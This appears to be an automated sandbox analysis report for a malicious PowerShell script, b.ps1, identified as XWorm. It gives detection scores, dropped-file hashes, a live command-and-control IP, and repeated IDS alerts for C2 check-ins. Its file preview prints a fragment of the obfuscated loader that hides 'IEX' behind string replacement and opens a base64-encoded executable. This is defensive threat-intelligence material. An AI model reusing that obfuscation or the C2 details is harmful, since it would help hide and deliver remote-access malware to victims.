DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
13% | Virustotal | Browse | ||
8% | ReversingLabs | Win32.Trojan.Generic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| true | | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
176.113.115.228 | unknown | Russian Federation | 49505 | SELECTELRU | true |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1599699 |
Start date and time: | 2025-01-26 10:33:11 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 8m 15s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 13 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | b.ps1 |
Detection: | MAL |
Classification: | mal100.troj.evad.winPS1@7/14@0/1 |
EGA Information: | Failed |
HCA Information: |
Cookbook Comments: |
- Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 20.42.73.29, 52.168.117.173, 40.126.32.74, 13.107.246.45, 20.109.210.53, 20.190.159.4
- Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target RegSvcs.exe, PID 6568 because it is empty
- Execution Graph export aborted for target powershell.exe, PID 3716 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description |
---|---|---|
04:34:11 | API Interceptor | |
04:34:15 | API Interceptor | |
04:34:35 | API Interceptor | |
04:37:46 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
176.113.115.228 | Get hash | malicious | XWorm | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
SELECTELRU | Get hash | malicious | XWorm | Browse |
Get hash | malicious | Socks5Systemz | Browse |
Get hash | malicious | Socks5Systemz | Browse |
Get hash | malicious | LummaC Stealer | Browse |
Get hash | malicious | Unknown | Browse |
Get hash | malicious | Unknown | Browse |
Get hash | malicious | Amadey, Babadeda, LummaC Stealer, PureLog Stealer, Stealc, Vidar | Browse |
Get hash | malicious | Gafgyt, Mirai | Browse |
Get hash | malicious | Gafgyt, Mirai | Browse |
Get hash | malicious | Gafgyt, Mirai | Browse |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.1749288364721844 |
Encrypted: | false |
SSDEEP: | 192:CrHEOLEk8Qcsy/0BU/Sa6THy8WkmzuiFNZ24IO8aX:+RL+Q/ZBU/SaWS/9zuiFNY4IO8a |
MD5: | E45700890495370F74E7C5C54F9A3014 |
SHA1: | 20DA3A802629B4A72AAADB7FE97AF3CF1E422841 |
SHA-256: | EEFF8FFD4BBB5171B813499D51DCF2A76C284124A71C7F60E11C31802C5EFB10 |
SHA-512: | FC61D41F00555434E38CEA2243B1552F292A29409B37C57104E650B67EBA4C5D216DFA9CF1FDA94708F9A67929AE1612B4CB9E930B05C241468B77E49F9582BD |
Malicious: | false |
Reputation: | low |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.5318512986567241 |
Encrypted: | false |
SSDEEP: | 96:8B2FajaIhrxYid6zRH3Uje0e35/3oo7p1QXIGZAX/d5FMT2SlPkpXmTAfFf/VXTT:3yaIhmG6zR30mYAzuiFtZ24lO8 |
MD5: | FEDF4338E94A280DF54F3D727CD7FAD0 |
SHA1: | 825D6A39B56FC46507230088622C81B3978E93F1 |
SHA-256: | 5C2BA8ED78B235D841143ACC9F339D357ABCDFE6C03E7E3761007F8AA083FB1B |
SHA-512: | F5EA95DC6E241E5D1C86F101760EAC1E1849C988B2644243B35FB6AFB4819F16058CC18A87066CF457823B9572FD3790AC5D18F1FD302220EAF821C4C065D7EC |
Malicious: | false |
Reputation: | low |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 7288 |
Entropy (8bit): | 3.731107745118637 |
Encrypted: | false |
SSDEEP: | 96:RSIU6o7wVetbrpQjW6YEc7ariyM6gmfHNpXEr/BA5aMANm:R6l7wVeJrp/6YEIariypgmftECpANm |
MD5: | 76513552889CE39896431C583A62D1E2 |
SHA1: | A172FB40B67B7F0CC5113AB0416B201862964C05 |
SHA-256: | D5CAFCAC03DDA2E1E72B5FA77148D0519CD230FC4EFFAE8527A028E4A3A32A17 |
SHA-512: | 4BC9D5A403396EF3BBB400B3ECF54840D36076FB99B815E145032468A3B8AC8C54148B54F63D0B28CD82B48902F58A94CC6C23281042667DC14E8196BD9B195D |
Malicious: | false |
Reputation: | low |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4905 |
Entropy (8bit): | 4.692638124385983 |
Encrypted: | false |
SSDEEP: | 96:uIjf0I7OCa7VBJFKloFMMFh+pjWTzFMMFgufnd:uIIYOj7h45Coufd |
MD5: | D751F58A10422CCFF75C786CA27AA9CD |
SHA1: | 509CAFC55A43ED49F36F1565F2A22D218BDC00BD |
SHA-256: | 4D593C2AC31AB669904EC4BFE57317F2858C23182E0B61E6363453DDC49FC494 |
SHA-512: | D8708CFDE51B0E605BC71EBDC383B0DD2679590ED8294DB7F18587B080C48201C2E6A90904E74AF084BEDA72AF7C01005DB510799595E6F1395D6DEE84901D1B |
Malicious: | false |
Reputation: | low |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330087 |
Entropy (8bit): | 3.5427843741165983 |
Encrypted: | false |
SSDEEP: | 6144:brXZw4jvGjVdQTgG6atJRAyR2GlvSQj4SqY:brtvG8TioU5S9 |
MD5: | 7004B2F7C7D7743CA692AC3024B352DC |
SHA1: | 19B9319DCB490318CAE2F54AD1E5A20FF8E26B9E |
SHA-256: | 9F170C35280D1B63C299AEBF24B5ABBD48E01D7C892FC56CB389EB5629F0700D |
SHA-512: | 2B39D36062C4BE8726D59E9C4BEBA2570606E9733AB0597D328931B0D4A0A33C91461588CE96816C10F734241B83A3D55197F6477F3D8ED7C4A176F95165D50C |
Malicious: | false |
Reputation: | low |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8356 |
Entropy (8bit): | 3.68818233754692 |
Encrypted: | false |
SSDEEP: | 192:R6l7wVeJ5b6g8Q6YxGvSkQgmfZ4Aprk89b3GsfgH39m:R6lXJV6gj6Y2S7gmfSs3lfgQ |
MD5: | 09A9BB87F5C9A9B9292F864545B6AB61 |
SHA1: | C790622211946D363A0EA7527E8281B35CB811F7 |
SHA-256: | E15CEE739696E94B48C32E096740A18FDA88E33427749BAA1B12CBDDE6FDB2A1 |
SHA-512: | 9AF2604C9602876914EEF80F8A8B78A467D8D0731570E10CA0DB094716035A5896B376934EBE5A20BEB6E47A4EB385414F20293BA829BC8F3D8695DA046A207C |
Malicious: | false |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4726 |
Entropy (8bit): | 4.442737188860243 |
Encrypted: | false |
SSDEEP: | 48:cvIwWl8zsLJg77aI9FCrWpW8VYBYm8M4J+VFo+q8v5kmDIDd:uIjflI7vCa7VZJ/KSmDIDd |
MD5: | 3A3AAFAC7F6E0647CEAEF017769F7FC6 |
SHA1: | C57B29A01101B2088D4CF8B631B9546FF79CCFFE |
SHA-256: | 676E87C60B56AC054632732E9CBDCE728C155F30E88D1C9CD875CAB1AC01764D |
SHA-512: | 8149154B9551FE8C33374335FA454BEDDE1503125B74BA84CEF24A7BC2C7F6E442F71C927EC2E29A69195980A186558D380FF1B099D723CEDE0EC57A0E09F97F |
Malicious: | false |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11608 |
Entropy (8bit): | 4.890472898059848 |
Encrypted: | false |
SSDEEP: | 192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP |
MD5: | 8A4B02D8A977CB929C05D4BC2942C5A9 |
SHA1: | F9A6426CAF2E8C64202E86B07F1A461056626BEA |
SHA-256: | 624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715 |
SHA-512: | 38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2 |
Malicious: | false |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulJnp/p:NllU |
MD5: | BC6DB77EB243BF62DC31267706650173 |
SHA1: | 9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF |
SHA-256: | 5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27 |
SHA-512: | 91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9 |
Malicious: | false |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6222 |
Entropy (8bit): | 3.694767108166484 |
Encrypted: | false |
SSDEEP: | 96:smkCUohGkvhkvCCtRHYkTZdH+HYkTZCFHR:smgjRHYkWHYkO |
MD5: | E09E8E4F52892C518EAEDF3035CDF08E |
SHA1: | 25927B618B9DFCFE71114919D9DDA355282D46AE |
SHA-256: | 7442DE644641FB92CCE879EF2FA52A8024F45394042B881C4A53C7DB9E556529 |
SHA-512: | 974B8F2D443321242BB132E876A6EB812BE562F72DC8D6C886DDC739DDC325AB4387B65142D81DAECCF0A95C7553EAB8B2914B990214261FEE0278EF09EE08CF |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1835008 |
Entropy (8bit): | 4.425858083576356 |
Encrypted: | false |
SSDEEP: | 6144:4Svfpi6ceLP/9skLmb0OTlWSPHaJG8nAgeMZMMhA2fX4WABlEnNX0uhiTw:DvloTlW+EZMM6DFy103w |
MD5: | 5C62D2A5872D1008568312556F88F772 |
SHA1: | 5971CC9F1AAAB81B284C5F5E945F7527273FFD38 |
SHA-256: | D771BA9B6410D4183099D9CDC4AB33FDFD74D0E110AF4F47024E3D02E89F3900 |
SHA-512: | D2FC6314530860521EAEB3D17BE7C6EC9F690D13569B4E15166DB059F401098CDA3793DA5EAD10219E6CAEAF9E67CB7D042B62E8310E05ECB748C16559358919 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 5.2108360392533335 |
TrID: | |
File name: | b.ps1 |
File size: | 185'580 bytes |
MD5: | b5008db49b4ac5e668451b9a34ce2b76 |
SHA1: | 820ebe8c35bf4c57e1e439e4b10cee8186c444d3 |
SHA256: | 7367d1b56aca0b585cef8466d8d9a83dac03f0e6d81f9e89567c10a2cc44a4bc |
SHA512: | 43e8929ec5f728ee53f9a2b378f1949a789ac1e0a92fea559541444b39a3ca8da9911751bda6d37d30831f60af8b0356c4294b695de303cdd076c7c9b550c754 |
SSDEEP: | 3072:ZcUKZ20H5qt7ABLmYOlba6c5GdOa7MQrq3v0ayW3sfc4xDAmMz/zlZVdtj0QGTgn:ZcB20H5qt7ABLmYOlba6c5GdOa7MQrq/ |
TLSH: | CA047C321102BC8E9F7F3E48A5042D911CDC3877AB69C158FAC60AAD75EA650DF39DB4 |
File Content Preview: | .... $t0='JOOOOIEX'.replace('JOOOO','');sal GG $t0;....$OE="ug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAFOelGcAAAAAAAAAAOAALiELATAAACABAAAkAQAAAAAAEj8BAAAgAAAAQAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAQA |
Icon Hash: | 3270d6baae77db44 |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-26T10:34:28.544276+0100 | 2858800 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:34:28.769948+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:34:28.814226+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:34:36.918088+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:34:36.918088+0100 | 2858801 | ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:34:40.555436+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:34:40.558655+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:34:52.350845+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:34:52.357325+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:04.163753+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:04.166179+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:06.917867+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:15.963703+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:15.967787+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:25.653662+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:25.655476+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:25.854717+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:25.864086+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:26.619507+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:26.643517+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:31.488042+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:31.490610+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:31.901153+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:31.946435+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:36.906588+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:41.125293+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:41.127120+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:52.921008+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:52.923666+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:56.558294+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:56.564382+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.438235+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.442442+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.562563+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.564213+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.688443+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.689951+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.811883+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.820321+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.934237+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.942247+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:06.915056+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:08.851433+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:08.857621+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:08.974394+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:08.976077+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:09.104641+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:09.106351+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:09.576639+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:09.578400+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:22.254524+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.255919+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.256062+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.256207+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.257763+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:22.472568+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.474521+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:24.180863+0100 | 2858799 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:24.397558+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:24.399249+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:34.555246+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:34.559337+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:35.219704+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:35.221750+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:36.902304+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:47.007422+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:47.011390+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:58.808052+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:58.809874+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:04.368257+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:04.373284+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:06.917682+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
